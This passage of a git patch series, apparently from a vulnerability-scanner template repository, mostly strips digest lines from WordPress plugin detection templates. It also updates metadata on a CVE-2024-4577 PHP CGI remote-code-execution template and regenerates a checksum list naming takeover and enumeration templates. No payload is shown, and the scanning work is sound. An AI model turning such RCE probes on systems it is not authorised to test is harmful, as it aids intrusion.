b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022007193b4c16021851037e35a5d178728f0757340decc18c0a071fbcc9fdcefc94022100e5253d73641df51891a8b6d57e7768bf8d3626a79c9c920bbf8e244cbda087c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 9d392cea99..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087b90a19c44e0f1d898e1d2d7c0ed0952a489d6e4cc3c699c803761f50179b9702206a98b496d7d5fe808c26e2e55a4c75fde0d0211f362697edf75bc782a93ac93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index b50d724336..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ba059da1a3ad3b6d223ad26d4e392dd8f2091b81b1ea021918cd3a871b5e22402205ef6fcca57755650d979dac296f30a632661a2f19522551768930015c395bb53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 3474ab7c05..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220466a09cd2fbbba6352b449c5f9cb6861a6c3fab34b83d6845ac6feec7d9cfefe02200417046276f56f05c615561b925c4011fed8e895158334b7f2aaa43e4412e955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 849404e0d9..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fdd02cae6bb8e5aa34fd84636a1efa22133dc1dd77391cf093e76747fc09017302202636e537da6e35b85d2edb81d865cc19c8e57ca7e3973092a355b8e4721df20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 603bdc8142..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5fcaf0afe92479da6e90390343e73d7d9dd172747e0dec397bcc92b0794060702202f6babb2db792e318b4f5b8cd82c3aee6a822f97f8164a4b7e9f69eb176b23f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index b708e4b78f..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026cca5baa6324684709df026ee1c82046cd760a2f8dd3efb7181f2b3aee3f0f302201746067f5ecafefb4908fade06d253fb6be18cb2722984c67c4c25ae52537ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index cb13303fda..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8c5f8bf533ac8e1f14466637d4d1c1e60f46abb4dbce23cc980237509df83ac022059dbc4001995efe2ea081d11bf853e3a2deedeb56bbbf59cf3bc615da4b86c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b611d59ade..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023e9d60c3b15084a771997fca4a01dfce08af677e4d7bdfd3f256409888acdc4022100fd007492509c852a3b6b5828564efd1fff385559de08311ecac5f5888ccc2de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 89dd065a43..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207cc19dae8ac9fb8992d01107aea3b451d279845a044e58af3f9120d5943ee8e902207866eae44522a35d3606e5881941bc93ce18c9319005d9d3ce51ed0d8b4a9223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index b03db6cfa9..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a08564d2ecfc92a20cb04fff83073bbef91786295067d32646338909dc1d881022100e00222297554289c6a5d68738f1aa7181e906f5f2fe1d9828192b97eafbed7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 20b199db99d56338882327226c67946efd24d34d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Thu, 18 Jul 2024 10:47:27 +0800 Subject: [PATCH 1346/1841] Update CVE-2024-4577.yaml --- http/cves/2024/CVE-2024-4577.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 0a012537a7..065ab6d776 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -4,6 +4,8 @@ info: name: PHP CGI - Argument Injection author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch severity: critical + reference: + - https://cloud.tencent.com/developer/article/2429455 description: | PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP. impact: | @@ -12,7 +14,7 @@ info: Apply the vendor-supplied patches or upgrade to a non-vulnerable version. metadata: verified: true - tags: cve,cve2024,php,cgi,rce + tags: cve,cve2024,php,cgi,xampp,rce http: - method: POST @@ -31,4 +33,4 @@ http: part: body words: - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a" -# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950 From 78c2253098f3d8a5eef234d70750a4f16bb203a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 04:31:13 +0000 Subject: [PATCH 1348/1841] Auto Generated Templates Checksum [Thu Jul 18 04:31:13 UTC 2024] :robot: --- templates-checksum.txt | 572 ++++++++++++++++++++--------------------- 1 file changed, 286 insertions(+), 286 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4e50858047..a1286ac7b1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -753,7 +753,7 @@ helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:4817cb4528a6e4857fb571db95197ba2033c4fc1 -helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb +helpers/wordpress/plugins/broken-link-checker.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/chaty.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f @@ -766,11 +766,11 @@ helpers/wordpress/plugins/code-snippets.txt:bcfacf8cd6cd2afbf752b95fba64c2c67f0c helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c helpers/wordpress/plugins/contact-form-7-honeypot.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/contact-form-7.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05ee8f7 +helpers/wordpress/plugins/contact-form-7.txt:9ed846d0f4da601ec302229b03808fcd2b2290ea helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d -helpers/wordpress/plugins/copy-delete-posts.txt:a2048abb201b6201e7cd25e8b0262758a98d59da +helpers/wordpress/plugins/copy-delete-posts.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 @@ -809,7 +809,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:cef8b08512cec8f1ab07ed0f56 helpers/wordpress/plugins/google-site-kit.txt:3fc4f3215f2c02622f980d28a4791bcc6857a95e helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:2aec4d7bf0ab32bb446c2b0aed18357efa20cd9f +helpers/wordpress/plugins/gutenberg.txt:c0b7132c131b0bc84961d92e38abb3eb41c6eb80 helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -817,12 +817,12 @@ helpers/wordpress/plugins/header-footer-elementor.txt:7a2aa38dbae06f99122c345cce helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad -helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf +helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 helpers/wordpress/plugins/hostinger.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/image-optimization.txt:a9ec402f06cdb367cb4ecd9d221265dbc42431cf helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 -helpers/wordpress/plugins/insert-headers-and-footers.txt:b02d54c37a0b10952ea10194f9d0deec6e24ff40 +helpers/wordpress/plugins/insert-headers-and-footers.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c @@ -838,17 +838,17 @@ helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e733 helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 +helpers/wordpress/plugins/mailchimp-for-wp.txt:6f8941ad5d1dfeb1e4d4a276b9ad1dbce8a7cc0d helpers/wordpress/plugins/mailpoet.txt:970defc3a5b51878c279d9b687b808ec0765df77 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c -helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c +helpers/wordpress/plugins/malcare-security.txt:eb5ffc0342cb0113a96a05c48dd1c79f3aa9174b helpers/wordpress/plugins/megamenu.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 -helpers/wordpress/plugins/meta-box.txt:55193864c8fe639aac62a66b52b3b102397e0cf9 +helpers/wordpress/plugins/meta-box.txt:d671e38ac88381575198332ef9ebb2b70b2841f4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:75c024ece33c58576c793ad8930682e902abfb64 -helpers/wordpress/plugins/newsletter.txt:3bbfae3f687852a9154bb60511ccdd52b2d6d57b +helpers/wordpress/plugins/newsletter.txt:1367078ebee3d42232e6c2aaa74f83439f5d235e helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 helpers/wordpress/plugins/ninja-forms.txt:b551dceb18411def5ed66556a7d0855f82ba865f @@ -879,7 +879,7 @@ helpers/wordpress/plugins/royal-elementor-addons.txt:d23cb39919efcacdfc1a6342871 helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d5268bae helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb -helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 +helpers/wordpress/plugins/sg-security.txt:29cd3f50fdf56b43132cb011be27e5a2567b76ae helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:01ac9a64a711d9d1b7130e24a92eb95b0850c705 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b @@ -933,7 +933,7 @@ helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13 helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 -helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43480 +helpers/wordpress/plugins/wp-mail-smtp.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0 helpers/wordpress/plugins/wp-maintenance-mode.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd @@ -946,7 +946,7 @@ helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:982b37978de445a43803deafb09df7076adbabc4 -helpers/wordpress/plugins/wp-super-cache.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 +helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a @@ -3497,7 +3497,7 @@ http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 -http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b +http/cves/2024/CVE-2024-4577.yaml:953a81386c373bf33e7bb441b110a6f5b44a36dd http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a @@ -6807,78 +6807,78 @@ http/osint/user-enumeration/zillow.yaml:6310312dfbeca22632a8b56feaf02d6a8d63c2a5 http/osint/user-enumeration/zmarsacom.yaml:ffb6dde4769b58aed12e36b600faa66348c2f3a0 http/osint/user-enumeration/zomato.yaml:611325521c42aab8a0117b819dcecb3aae9d8df4 http/osint/user-enumeration/zoomitir.yaml:deb452a0a5dd3bbfad1feadbacc72e7c97ba832f -http/takeovers/aftership-takeover.yaml:069205c50d00b4ff86cd3a5fbe9125b9f1a64a32 -http/takeovers/agilecrm-takeover.yaml:ea29bef2bc93156ecf71dc01c6d1d4446516b98d -http/takeovers/aha-takeover.yaml:488b6c9e716c46bceb6215c2d76696e53d78a928 -http/takeovers/airee-takeover.yaml:ee6cc5e920fe110ca5dd81a47d16fbfb02305018 -http/takeovers/anima-takeover.yaml:336d7f7528cbf6c356965dc5338a1f0529d9bb03 -http/takeovers/announcekit-takeover.yaml:d2dcc22772060875e38c6625681bdeb809c42000 +http/takeovers/aftership-takeover.yaml:d82e8fa328556a2df18fc7a327d9fffa1047e8c2 +http/takeovers/agilecrm-takeover.yaml:07b63a95a0256fd325aac1231d18439c4e222270 +http/takeovers/aha-takeover.yaml:8938c75b50b8392114cd9d777ae02a4a8a67a793 +http/takeovers/airee-takeover.yaml:4d72789fba62f78d8ea383b89ad4b7662c484019 +http/takeovers/anima-takeover.yaml:c44a9a4078055e2f2df06a67e176602db43b7e93 +http/takeovers/announcekit-takeover.yaml:46a92c92d99548d9ac298ab6915496f61ea1dec7 http/takeovers/aws-bucket-takeover.yaml:770a292dd17881dfae48ae42c559224087da1a51 -http/takeovers/bigcartel-takeover.yaml:61aa9c86f57778f7534c31669d7aadc12ac3e6fb -http/takeovers/bitbucket-takeover.yaml:37a3d13eae1640753df0d45badc2d496c11d2bb0 -http/takeovers/campaignmonitor-takeover.yaml:2978382f88ea9a0bff0184c870ee76c19125437a -http/takeovers/canny-takeover.yaml:4a658b3018ed53acac054438e3e14a2a016360f8 -http/takeovers/cargo-takeover.yaml:5a8cba5b29d6ef34c616d903e009613be51362b1 -http/takeovers/cargocollective-takeover.yaml:610310b0edb31f0b363c22cf0a95b14273ab070d -http/takeovers/clever-takeover.yaml:1ec6a4879432cd8a0b38a9f904235c8b5400d578 -http/takeovers/flexbe-takeover.yaml:9e7f6cf2236d796c8dfa6ef352a5db717f0e2116 -http/takeovers/frontify-takeover.yaml:206ea0cecf27ecd9b3b1ab4367e52113d6d779ef -http/takeovers/gemfury-takeover.yaml:c77c3742467c458efb3c6a13bd7c1988a1486cdf -http/takeovers/getresponse-takeover.yaml:8a41df31712d189b309a362c08c97c59b757d714 -http/takeovers/ghost-takeover.yaml:9ef9ae599b8694c0c74a18a83d29a33fcd2cc42e -http/takeovers/gitbook-takeover.yaml:838870bccdf1f8178e1a15628503e325762a8a96 -http/takeovers/github-takeover.yaml:e0f8845ea71cebeea710af9a06651cdb8b9e3312 -http/takeovers/gohire-takeover.yaml:ed124cab5b16ce0272decbbf0a61205c562d8475 -http/takeovers/hatenablog-takeover.yaml:8544f7417ea29a5e21bdc8f89cbcd0e5e5e5a094 -http/takeovers/helpdocs-takeover.yaml:4432d3bc37a4d749de2dbaad0290d5cfd31e263a -http/takeovers/helpjuice-takeover.yaml:0add9aeba21683a96357646f3fb1b179b2f5906d -http/takeovers/helprace-takeover.yaml:12a22aede35dcca70c4f06403f80ecf34207c4cb -http/takeovers/helpscout-takeover.yaml:f1021eb7813bd163caf73fe47d67248254f7ebae -http/takeovers/hubspot-takeover.yaml:e75d0ef408cfa76963cf1a5be2842d72b760cc20 -http/takeovers/intercom-takeover.yaml:55b4b2ab39e2340d5166fa2ea862ed81fe9eab4c -http/takeovers/jazzhr-takeover.yaml:ccfa03e4754c9eb73e2f9285c05d929ee56fbdee -http/takeovers/jetbrains-takeover.yaml:af58c635cdaeced195a4eb82dd7569a471574bbf -http/takeovers/kinsta-takeover.yaml:73c6c7c121994e36ffc18f484ec1af29d65568b0 -http/takeovers/launchrock-takeover.yaml:7229fe3d665d79a444a666dea2780a2b66fc5f17 -http/takeovers/leadpages-takeover.yaml:ba93408ff87594553456ec3865e70217c693caf2 -http/takeovers/lemlist-takeover.yaml:06622483538647175f70e4c838ce05f005ff3960 -http/takeovers/mashery-takeover.yaml:c736c94e6a6ae1b147645659d9f01bf3fc724449 -http/takeovers/meteor-takeover.yaml:7182dc2d5d0e8f6112c36ef93164db24bb7da999 -http/takeovers/netlify-takeover.yaml:7bdb14ececbb10443f234b4cbda555a46a5e72a1 -http/takeovers/ngrok-takeover.yaml:76736d354bf8f92bb8cde82d8d746e21ab642cb9 -http/takeovers/pagewiz-takeover.yaml:1f6ce96db902a68afd2bbc4e13272e2411eed96d -http/takeovers/pantheon-takeover.yaml:0eaa4d675dec3ad06785b881863a8f00540bfcbb -http/takeovers/pingdom-takeover.yaml:2dd6934672e77511f7ad3588d151982d77e5e4ec -http/takeovers/proposify-takeover.yaml:b5ef1e8644085b37a2fe9d20d4d3c7f7804a2a67 -http/takeovers/readme-takeover.yaml:d9e233c43a4f6f8e7bf6b06be3d5bb5c0036ddc0 -http/takeovers/readthedocs-takeover.yaml:cbcd46fb93fbadd6b0d00ce7aca2f743f8aaeff2 -http/takeovers/shopify-takeover.yaml:afad2113dba5b407f30e387b5176a2494ef68ca9 -http/takeovers/short-io.yaml:daa048f99b924927544f508ad5716e81d6497627 -http/takeovers/simplebooklet-takeover.yaml:e8c29126627d96e8c4e56ccf1b115ae9ca0e96ec -http/takeovers/smartjob-takeover.yaml:9a03cde93c694fab773b5a3cb97662f530813232 -http/takeovers/smugmug-takeover.yaml:a0cdd4e8f7455ac1062e084ec15651f80ae5b461 -http/takeovers/softr-takeover.yaml:8a787ce0846c240b9a1abd2a49c8f734057bc85a -http/takeovers/sprintful-takeover.yaml:482dda18d58fcaa3eb959e84bb7298b2cb9710fa -http/takeovers/squadcast-takeover.yaml:7178c123d297f5780fb743ced6b74f92d22fcd5a -http/takeovers/strikingly-takeover.yaml:131aa9f30a5ba0766df9c02a182c08f5a75d9b93 -http/takeovers/surge-takeover.yaml:77e51ed412624dbe4bdf275e0fecc7bd28739131 -http/takeovers/surveygizmo-takeover.yaml:3d17a9db43c32f131ef32be89692fa78887e2a0e -http/takeovers/surveysparrow-takeover.yaml:197c3e641f8d439e6d40df198e8453d70b08f814 -http/takeovers/tave-takeover.yaml:eafb6f75732c4afa8fb538c4c5b7c6c392004b97 -http/takeovers/teamwork-takeover.yaml:dd8d78492cef2cb8d616f84fb6b7681991acae32 -http/takeovers/tilda-takeover.yaml:ea9c072774c0052fa9a11989a2d88cc9a16fcda8 -http/takeovers/tumblr-takeover.yaml:539c9abc375aaeadc6d5cf51f5e54868761bb8f7 -http/takeovers/uberflip-takeover.yaml:20345e4d8fdc70d39c167c401fd1fd2d7820eba8 -http/takeovers/uptime-takeover.yaml:26ffd1a8b1f50f59f45d8466d7760b1ea67fc936 -http/takeovers/uptimerobot-takeover.yaml:ca6e92b1186de2f75b7218c43b349f28c052b04f -http/takeovers/uservoice-takeover.yaml:3c176091b63c8147c8ed8f15b10dae9dd59b6115 -http/takeovers/vend-takeover.yaml:fe04b034e116c9ce915a17fedb5f4fd87352f1c2 -http/takeovers/wishpond-takeover.yaml:5c9794bfe5888f99ba6d1e9481c8107c42625388 -http/takeovers/wix-takeover.yaml:619522f4f594a3db207c710de092472d1422249e -http/takeovers/wordpress-takeover.yaml:a64987be8e1dd418791e5fb28ea2d7c00a6f4e43 -http/takeovers/worksites-takeover.yaml:b8eea20d823ecadd37c633df3928cbcc99ca7c1f -http/takeovers/wufoo-takeover.yaml:0bae53b2430ddcffbfb1e3d7686c186adcf18a71 -http/takeovers/zendesk-takeover.yaml:242274440eae8dd08a92c31a11200fe047862b36 +http/takeovers/bigcartel-takeover.yaml:6b6d984ae0ea7a8fee936b78e6f58602bc2aa752 +http/takeovers/bitbucket-takeover.yaml:2f92c0964d622bb2df9658b0cdb38941498b313c +http/takeovers/campaignmonitor-takeover.yaml:0c967253bebaa6a3a5caf94e60dd07a12525207f +http/takeovers/canny-takeover.yaml:cc3ffa83968ffcdef21efa9cbe7ab7e2af48758f +http/takeovers/cargo-takeover.yaml:4df841f476659fa681a2aed2a6d3ca638afcd6d5 +http/takeovers/cargocollective-takeover.yaml:d30660c29951ff1a251db9f41f4c283c64590a3a +http/takeovers/clever-takeover.yaml:7bdd5701cfa7e26721de7309a0be28957fd81228 +http/takeovers/flexbe-takeover.yaml:af07fa59db0014bc7c6e2364bc19ceff2442cd7a +http/takeovers/frontify-takeover.yaml:5d9b1221ca45e5ba96e4a4800d5b68ea032965f4 +http/takeovers/gemfury-takeover.yaml:fda27d7107dfab3b842c0982a7fe4228a363d9cb +http/takeovers/getresponse-takeover.yaml:56c88b972dff0165a893579f1e866d8f007e3532 +http/takeovers/ghost-takeover.yaml:8496cdd346fe5cac9f3bcfb72fff0ba4e2a29c96 +http/takeovers/gitbook-takeover.yaml:318d5411acaaef16a3ce9cefd89d7ca2f0946952 +http/takeovers/github-takeover.yaml:3ab2916376c820ef82e867d26bef895a0dd1b65b +http/takeovers/gohire-takeover.yaml:af5a9cd312a7b4ae84562e3fdfac3f7cbbdc2c79 +http/takeovers/hatenablog-takeover.yaml:2ce34df35b4b958f8d3d4806b94888fcae295c9b +http/takeovers/helpdocs-takeover.yaml:58dd2e8ea38f82121c9fe7e50652965cdccdfd5d +http/takeovers/helpjuice-takeover.yaml:efa86f091e72f630b866a24aba2ff33f0fbeefef +http/takeovers/helprace-takeover.yaml:9ce48c2b3ac22d4bf31b327222d873fee50addc8 +http/takeovers/helpscout-takeover.yaml:b30c519ec9428183de29f1b75f376a702526d118 